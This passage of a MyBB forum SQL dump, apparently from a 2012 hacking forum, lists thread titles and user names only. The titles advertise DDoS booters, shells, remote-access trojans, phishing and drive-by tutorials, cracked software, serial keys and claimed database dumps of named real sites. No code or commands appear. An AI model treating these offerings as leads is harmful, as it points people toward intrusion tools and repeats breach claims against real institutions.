'0', '82', 'iTzIpod', '1349035943', '3008', '1350271825', 'iTzIpod', '82', '26', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('620', '34', '? Photoshop ? Complete Guide for Begginers [High Quality]', '0', '0', '0', '82', 'iTzIpod', '1349036135', '3009', '1349036135', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('621', '61', 'Free Skype Credits from Bing Rewards', '0', '0', '0', '82', 'iTzIpod', '1349036377', '3011', '1349036377', 'iTzIpod', '82', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('622', '42', 'Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '0', '0', '82', 'iTzIpod', '1349037236', '3013', '1349374549', '??zg???g????61', '100', '22', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('623', '42', 'Mom poured bleach into baby\'s eyes', '0', '0', '0', '82', 'iTzIpod', '1349037328', '3014', '1349037328', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('624', '42', 'Aliens Found In Brazil (Photos - Fake or Real)?', '0', '0', '0', '82', 'iTzIpod', '1349037413', '3015', '1349048847', 't3h jok3r', '1', '14', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('625', '61', 'Runescape Phishing Tutorial', '0', '0', '0', '82', 'iTzIpod', '1349039715', '3019', '1349090043', 'iTzIpod', '82', '4', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('626', '19', '[Junk]?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '0', '0', '82', 'iTzIpod', '1349040117', '3020', '1349124385', 'iTzIpod', '82', '12', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('627', '33', 'What can I do to improve this?', '0', '0', '0', '82', 'iTzIpod', '1349048760', '3027', '1350843495', 'iTzIpod', '82', '69', '18', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('630', '19', '[Junk]Why So? TEST', '0', '0', '0', '3', '??????????¢™', '1349051153', '3052', '1349051227', '??????????¢™', '3', '9', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('628', '19', '[Junk]Spoiler Test', '0', '0', '0', '3', '??????????¢™', '1349050161', '3044', '1349050226', '??????????¢™', '3', '8', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('629', '21', '[FREE] Giving Away DrDos Script [FREE]', '0', '0', '0', '100', '??zg???g????61', '1349104357', '3047', '1349538006', 'Jacob', '160', '38', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('631', '61', '45565 Shells', '0', '0', '0', '82', 'iTzIpod', '1349051556', '3055', '1349051556', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('632', '61', '1000 Emails Dump', '0', '0', '0', '82', 'iTzIpod', '1349051700', '3056', '1349052152', 'iTzIpod', '82', '3', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('633', '19', '[Junk]JOKER!!!!!!!!???????!!!!!!!!!!', '0', '0', '0', '3', '??????????¢™', '1349051866', '3060', '1349052066', '??????????¢™', '3', '10', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('635', '7', '[Milestone] L33tHacking Forum Total 3,000 Posts', '0', '0', '0', '82', 'iTzIpod', '1349061044', '3085', '1349378474', 'iTzIpod', '82', '14', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('636', '15', 'Free Host Booter', '0', '0', '0', '207', 'Combat', '1349069555', '3091', '1349069555', 'Combat', '207', '18', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('634', '7', 'Depressed', '0', '5', '0', '203', 'NeonLights', '1349053684', '3075', '1349268291', 'mothered', '205', '23', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('637', '16', 'I need to SE a gaming keyboard', '0', '0', '0', '62', 'R?????zo?', '1349092111', '3098', '1349609441', 'R?????zo?', '62', '51', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('638', '61', '100k+ Proxy List', '0', '0', '0', '82', 'iTzIpod', '1349092741', '3102', '1349092741', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('639', '66', '[News] Updates,Releases,Edits', '0', '0', '0', '61', 'NXK', '1349100608', '3107', '1349100608', 'NXK', '61', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('640', '21', 'sad', '0', '0', '0', '100', '??zg???g????61', '1349104320', '3109', '1349104320', '??zg???g????61', '100', '0', '0', '', '0', '0', '0', '', '-2', '0', '0', '0'); INSERT INTO mybb_threads VALUES('647', '14', 'VPNReactor (Free/Paid) **Deletes Logs**', '0', '0', '0', '5', 'Timmy', '1349143704', '3167', '1349784317', 'mothered', '205', '12', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('641', '42', 'File-Sharing for Personal Use Declared Legal in Portugal', '0', '0', '0', '62', 'R?????zo?', '1349106003', '3113', '1349198919', 'R?????zo?', '62', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('642', '61', '[FREE] DDOS, Cracking, Shells, Tools, phpfirewall and more!', '0', '0', '0', '62', 'R?????zo?', '1349107590', '3115', '1349374287', '??zg???g????61', '100', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('643', '7', 'L33thakcers.com members here?', '0', '0', '0', '213', 'BitMonst3r', '1349107675', '3116', '1349618716', 'BitMonst3r', '213', '45', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('644', '19', '[Junk]Testing', '0', '0', '0', '82', 'iTzIpod', '1349127944', '3143', '1349127944', 'iTzIpod', '82', '5', '0', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('645', '30', '[GET] Acunetix Web Vulnerability Scanner CE v8.0.20120305 Cracked !', '0', '0', '0', '1', 't3h jok3r', '1349141839', '3154', '1349323206', 't3h jok3r', '1', '5', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('646', '29', '[Tutorial] Hack RealityKing The biggest Hack!! WATCH FULL MOVIES *HOT*', '0', '0', '0', '5', 'Timmy', '1349142670', '3157', '1349142670', 'Timmy', '5', '10', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('648', '19', '[Junk]Testing', '0', '0', '0', '82', 'iTzIpod', '1349143901', '3172', '1349144129', 'iTzIpod', '82', '6', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('649', '3', 'Thanks to the following and L33THacking Monthly Stats', '0', '0', '0', '1', 't3h jok3r', '1349144845', '3179', '1349320849', 'Timmy', '5', '45', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('651', '61', '[Free] Thread Design', '0', '0', '0', '82', 'iTzIpod', '1349205877', '3200', '1349205877', 'iTzIpod', '82', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('650', '61', '[LEAK] ShockwaveBooter (V4.2) [FREE]', '0', '8', '0', '100', '??zg???g????61', '1349189593', '3193', '1349373984', '??zg???g????61', '100', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('652', '7', 'Being CyberBullied', '0', '0', '0', '82', 'iTzIpod', '1349221795', '3206', '1349405476', 't3h jok3r', '1', '104', '29', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('653', '43', 'Photoshop CS5 Serial Keys', '0', '0', '0', '1', 't3h jok3r', '1349234647', '3222', '1349264295', 'iTzIpod', '82', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('654', '9', 'Make money typing captchas', '0', '0', '0', '8', 'spacefish36', '1349235229', '3226', '1349984337', 'iTzIpod', '82', '42', '17', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('656', '8', 'why do ppl like this shitty song!?!?', '0', '0', '0', '203', 'NeonLights', '1349304875', '3267', '1351623460', 't3h jok3r', '1', '42', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('655', '43', 'ANY CS5 AND SOME CS4 ADOBE SERIALS', '0', '0', '0', '100', '??zg???g????61', '1349284820', '3253', '1349616231', '??zg???g????61', '100', '18', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('657', '19', '[Junk]why do ppl like this shitty song!?!?', '0', '0', '0', '203', 'NeonLights', '1349304913', '3268', '1349305354', 'iTzIpod', '82', '5', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('658', '52', '[Source]FB login + FB freezer using httpwebrequest', '0', '0', '0', '7', 'Romdu62', '1349319847', '3286', '1349319847', 'Romdu62', '7', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('659', '64', 'Stolen (2012) Movie RIP', '0', '0', '0', '5', 'Timmy', '1349320608', '3293', '1349410450', 't3h jok3r', '1', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('660', '30', 'Vulcan Private Logger', '0', '0', '0', '5', 'Timmy', '1349323439', '3300', '1349561397', '??zg???g????61', '100', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('661', '50', 'Bullshit', '0', '0', '0', '3', '??????????¢™', '1349325207', '3303', '1349403949', 't3h jok3r', '1', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('662', '7', 'Is this how you treat me?', '0', '0', '0', '3', '??????????¢™', '1349325643', '3306', '1349498293', 't3h jok3r', '1', '139', '30', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('674', '24', 'Oh NO! Learn how to destroy your hard drive completely', '0', '0', '0', '9', 'p420', '1349408586', '3412', '1349414607', 'mothered', '205', '7', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('663', '61', 'Tons of shells (Unchecked)', '0', '0', '0', '82', 'iTzIpod', '1349392422', '3378', '1349392422', 'iTzIpod', '82', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('664', '61', '100+ Shells', '0', '0', '0', '82', 'iTzIpod', '1349392517', '3380', '1349392517', 'iTzIpod', '82', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('665', '19', '[Junk]$5 Giveaway Contest', '0', '0', '0', '3', '??????????¢™', '1349392591', '3381', '1349393506', 'iTzIpod', '82', '12', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('667', '7', 'can you guys help me spread?', '0', '0', '0', '203', 'NeonLights', '1349400907', '3391', '1349405079', 'NeonLights', '203', '22', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('666', '61', 'Detailed Animation Tutorial', '0', '0', '0', '82', 'iTzIpod', '1349393036', '3383', '1349393036', 'iTzIpod', '82', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('799', '15', 'Darkcomet rat 5.4 Legacy Beta', '0', '0', '0', '203', 'NeonLights', '1349887269', '4158', '1350752208', 't3h jok3r', '1', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('669', '12', 'Hacking: The Art of Exploitation, 2nd Edition', '0', '0', '0', '203', 'NeonLights', '1349405460', '3404', '1349405460', 'NeonLights', '203', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('670', '16', '[Guide]How to get free Blizzard games/products.', '0', '0', '0', '5', 'Timmy', '1349407976', '3408', '1349438713', 'R?????zo?', '62', '13', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('671', '16', '[Guide]How to get free Blizzard games/products.', '0', '0', '0', '5', 'Timmy', '1349407976', '0', '1349407976', 'Timmy', '5', '0', '0', 'moved|670', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('672', '30', 'Blackshades NET [Setup + download]', '0', '0', '0', '5', 'Timmy', '1349408107', '3409', '1349736520', 'NeonLights', '203', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('673', '29', 'The only allowed \"how to deep web\" tutorial here.', '0', '0', '0', '5', 'Timmy', '1349408360', '3410', '1349921461', 'Timmy', '5', '32', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('675', '65', 'The Julian Assange Story', '0', '0', '0', '205', 'mothered', '1349413453', '3426', '1349413453', 'mothered', '205', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('676', '12', 'Cracking Tuts/Reverse Enginnering', '0', '0', '0', '205', 'mothered', '1349414067', '3427', '1349501384', 'mothered', '205', '18', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('677', '24', 'Windows Memory Limits', '0', '0', '0', '205', 'mothered', '1349414429', '3428', '1351030305', 'dccfoux', '285', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('678', '29', 'Get Free Domain names & Webhosting Packages e-Book [Written by me!]', '0', '0', '0', '172', 'MistaCode', '1349443882', '3446', '1350060722', 'MistaCode', '172', '17', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('679', '4', 'flamingworm here!', '0', '0', '0', '222', 'Exposé', '1349462521', '3449', '1349552170', 'p420', '9', '60', '17', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('680', '35', 'Some of my works...', '0', '0', '0', '222', 'Exposé', '1349463351', '3457', '1349552258', 'p420', '9', '44', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('682', '49', 'Hmm', '0', '0', '0', '219', 'kaitlin', '1349465888', '3478', '1349495892', 'Exposé', '222', '12', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('681', '49', 'Chatbox....', '0', '0', '0', '222', 'Exposé', '1349464870', '3466', '1349465103', 'iTzIpod', '82', '5', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('684', '19', '[Junk]Webtools - CF Resolver / Email Spoofer / Ping / Skype Tools & more', '0', '0', '0', '1', 't3h jok3r', '1349473660', '3498', '1349661206', 't3h jok3r', '1', '8', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('683', '61', '[Request] Twitter Bot?', '0', '0', '0', '82', 'iTzIpod', '1349472888', '3489', '1349472888', 'iTzIpod', '82', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('689', '19', '[Junk]Test', '0', '0', '0', '8', 'spacefish36', '1349475259', '3511', '1350855840', 'VirtualLegend', '228', '8', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('685', '13', '[HACKED] http://www.mahrukat.gov.sy/ database dump', '0', '0', '0', '223', 'StarZ', '1349474733', '3505', '1349474733', 'StarZ', '223', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('686', '13', '[HACKED] www.piedmont.k12.ca.us database dumped :3', '0', '0', '0', '223', 'StarZ', '1349474767', '3506', '1349474767', 'StarZ', '223', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('687', '13', '[HACKED] mclean.harvard.edu', '0', '0', '0', '223', 'StarZ', '1349474800', '3507', '1349476016', 'StarZ', '223', '16', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('688', '67', '[PHP] Email Bomber Source', '0', '0', '0', '12', 'jonas83', '1349474965', '3508', '1350823480', 'VirtualLegend', '228', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('690', '69', 'What are your fav or which coding languages do you know?', '0', '0', '0', '1', 't3h jok3r', '1349477700', '3516', '1350702581', 'Timmy', '5', '47', '13', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('691', '3', 'Gaming Section Released', '0', '0', '0', '1', 't3h jok3r', '1349479781', '3517', '1349562423', 'mothered', '205', '26', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('692', '71', 'COD Black OPs or COD MW3?', '0', '0', '0', '5', 'Timmy', '1349480570', '3518', '1350112717', 'XxTREYZxX', '257', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('693', '7', 'Hmmm?', '0', '0', '0', '3', '??????????¢™', '1349481345', '3525', '1349495575', 'Exposé', '222', '28', '11', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('694', '71', 'Gamers Recruitment', '0', '0', '0', '61', 'NXK', '1349489163', '3535', '1349489163', 'NXK', '61', '17', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('696', '13', '[HACKED] http://content.hks.harvard.edu', '0', '0', '0', '223', 'StarZ', '1349495564', '3550', '1349501541', 'mothered', '205', '22', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('695', '16', 'If you need help...i\'m here!', '0', '0', '0', '222', 'Exposé', '1349490202', '3540', '1349686910', 'R?????zo?', '62', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('698', '7', 'Skype group anyone?', '0', '0', '0', '222', 'Exposé', '1349495981', '3557', '1349703108', 'iTzIpod', '82', '19', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('697', '74', 'Who plays Minecraft out here?', '0', '0', '0', '1', 't3h jok3r', '1349495847', '3554', '1350113596', 'XxTREYZxX', '257', '31', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('700', '7', 'I\'m thirsty....what\'s your favorite drinks?', '0', '0', '0', '222', 'Exposé', '1349497812', '3572', '1349552825', 'p420', '9', '18', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('699', '47', '[All Members] Advance Member System', '0', '0', '0', '3', '??????????¢™', '1349496029', '3559', '1350427486', '??????????¢™', '3', '44', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('701', '49', 'Change Font in Logo?', '0', '0', '0', '222', 'Exposé', '1349499415', '3584', '1349845641', 't3h jok3r', '1', '41', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('702', '35', 'You guys like my new userbar?', '0', '0', '0', '222', 'Exposé', '1349502157', '3593', '1350186704', 'XxTREYZxX', '257', '38', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('703', '61', '[Request] Spreading eBook', '0', '0', '0', '100', '??zg???g????61', '1349525172', '3606', '1349525172', '??zg???g????61', '100', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('704', '66', 'Minecraft Accounts', '0', '0', '0', '82', 'iTzIpod', '1349533993', '3616', '1350259799', 'XxTREYZxX', '257', '23', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('705', '61', 'Minecraft Accounts', '0', '0', '0', '82', 'iTzIpod', '1349534141', '3617', '1349620761', 'iTzIpod', '82', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('730', '72', 'Need for Speed Most Wanted limited edition', '0', '0', '0', '1', 't3h jok3r', '1349548040', '3677', '1350202492', 'spacefish36', '8', '17', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('706', '4', 'Supppp', '0', '0', '0', '214', 'Rave™', '1349541493', '3633', '1349636137', 'Anonymous™', '199', '21', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('707', '13', 'How to migrate CRACKED minecraft accounts!', '0', '0', '0', '214', 'Rave™', '1349541573', '3634', '1349547508', 'iTzIpod', '82', '13', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('708', '16', 'EA Games', '0', '0', '0', '214', 'Rave™', '1349541618', '3635', '1349541618', 'Rave™', '214', '5', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('709', '16', 'SE Microsoft', '0', '0', '0', '214', 'Rave™', '1349541657', '3636', '1349541657', 'Rave™', '214', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('710', '12', 'Ultimate Spreading Guide', '0', '0', '0', '214', 'Rave™', '1349541907', '3637', '1350563972', 'VirtualLegend', '228', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('711', '16', '[EASY] SE Books', '0', '0', '0', '214', 'Rave™', '1349541964', '3638', '1349541964', 'Rave™', '214', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('712', '13', 'SQL Injection Ebook', '0', '0', '0', '214', 'Rave™', '1349542033', '3639', '1349842309', 'mothered', '205', '13', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('713', '12', 'How To Make A FUD Java Drive-By', '0', '0', '0', '214', 'Rave™', '1349542067', '3640', '1349753683', 'NXK', '61', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('714', '3', 'Spam Bot Bug', '0', '0', '0', '214', 'Rave™', '1349542427', '3641', '1349542427', 'Rave™', '214', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('715', '23', 'Free HostGator Hosting! [N00B Friendly]', '0', '0', '0', '214', 'Rave™', '1349542488', '3642', '1349607512', 'mothered', '205', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('716', '16', 'Roku 2 XD', '0', '0', '0', '214', 'Rave™', '1349542540', '3643', '1349867311', '??zg???g????61', '100', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('717', '12', 'How to Bruteforce VPS!', '0', '0', '0', '214', 'Rave™', '1349542596', '3644', '1350014940', 'mothered', '205', '19', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('718', '16', 'Apple Cookie Case', '0', '0', '0', '214', 'Rave™', '1349542676', '3645', '1349613997', '??zg???g????61', '100', '13', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('719', '16', 'AstroPID Clean', '0', '0', '0', '214', 'Rave™', '1349542721', '3646', '1351951489', 'iTzIpod', '82', '15', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('720', '16', 'How to find Serial/PID', '0', '0', '0', '214', 'Rave™', '1349542771', '3647', '1349542771', 'Rave™', '214', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('721', '16', 'Microphone', '0', '0', '0', '214', 'Rave™', '1349542822', '3648', '1349542822', 'Rave™', '214', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('722', '16', 'Plantronics GameCom 780 Surround Sound Gaming Headset', '0', '0', '0', '214', 'Rave™', '1349542879', '3649', '1349542879', 'Rave™', '214', '7', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('723', '16', 'iFrogs', '0', '0', '0', '214', 'Rave™', '1349542930', '3650', '1349542930', 'Rave™', '214', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('724', '74', 'Cheese Cake Client', '0', '0', '0', '214', 'Rave™', '1349543370', '3651', '1350113789', 'XxTREYZxX', '257', '26', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('725', '7', 'L33THacking Cloudflare Resolver!', '0', '0', '0', '214', 'Rave™', '1349543426', '3652', '1349620732', 'iTzIpod', '82', '20', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('726', '13', 'Dorks', '0', '0', '0', '214', 'Rave™', '1349543495', '3653', '1350118986', 'PiXEL^OG', '258', '17', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('727', '35', 'Rate My Thread Design + Download', '0', '0', '0', '214', 'Rave™', '1349543534', '3654', '1349563047', 'mothered', '205', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('728', '8', '[Sick Heavy] My first Dubstep Album [Sick Heavy]', '0', '0', '0', '214', 'Rave™', '1349543956', '3655', '1349543956', 'Rave™', '214', '8', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('729', '7', 'Skype Virus [MUST READ!]', '0', '0', '0', '3', '??????????¢™', '1349545873', '3657', '1350339948', '??????????¢™', '3', '53', '16', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('731', '3', 'PIDs for normal or upgraded?', '0', '0', '0', '9', 'p420', '1349552972', '3699', '1349570198', 't3h jok3r', '1', '10', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('732', '7', 'Congratz iTzIpod', '0', '0', '0', '5', 'Timmy', '1349555063', '3709', '1349567466', 'iTzIpod', '82', '20', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('733', '19', '[Junk]Who is [removed] out here?', '0', '0', '0', '1', 't3h jok3r', '1349556171', '3712', '1349559741', 'NXK', '61', '12', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('734', '3', 'Downtime, PMs and Members', '0', '0', '0', '1', 't3h jok3r', '1349582977', '3733', '1349824286', 'The Anarchist', '246', '99', '21', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('735', '59', 'Ultimate Bitcoin Guide! Earn for playing games & More!', '0', '0', '0', '1', 't3h jok3r', '1349586132', '3735', '1349620489', 'iTzIpod', '82', '9', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('742', '59', 'The Code Book: How to Make It, Break It, Hack It, Crack It', '0', '0', '0', '213', 'BitMonst3r', '1349619405', '3771', '1349619405', 'BitMonst3r', '213', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('736', '7', 'Should I make a l33thacking Skype resolver?', '0', '0', '0', '214', 'Rave™', '1349608570', '3744', '1349633565', 't3h jok3r', '1', '15', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('737', '7', 'Just voted', '0', '6', '0', '214', 'Rave™', '1349608733', '3746', '1349693996', 'mothered', '205', '18', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('738', '43', '[LEAK] AVG 2013 Serial Keys', '0', '0', '0', '100', '??zg???g????61', '1349616554', '3760', '1349824446', '??zg???g????61', '100', '14', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('739', '59', '? $400+/DAY ! Ultimate E-Whoring Guide ?', '0', '0', '0', '213', 'BitMonst3r', '1349616888', '3762', '1349619460', 'BitMonst3r', '213', '7', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('740', '3', 'I am only one who gets this error?', '0', '0', '0', '213', 'BitMonst3r', '1349617212', '3763', '1349633391', 't3h jok3r', '1', '31', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('741', '9', '7 Videos That Will Show You How To Make Real Income Online!', '0', '0', '0', '213', 'BitMonst3r', '1349618884', '3766', '1349758717', 'BitMonst3r', '213', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('743', '23', 'I got a virus', '0', '0', '0', '82', 'iTzIpod', '1349641472', '3792', '1349703619', 'iTzIpod', '82', '13', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('744', '19', '[Junk]Site Purchased', '0', '0', '0', '243', 'Anarchy $ucks', '1349642114', '3793', '1349649205', 't3h jok3r', '1', '107', '9', '1', '0', 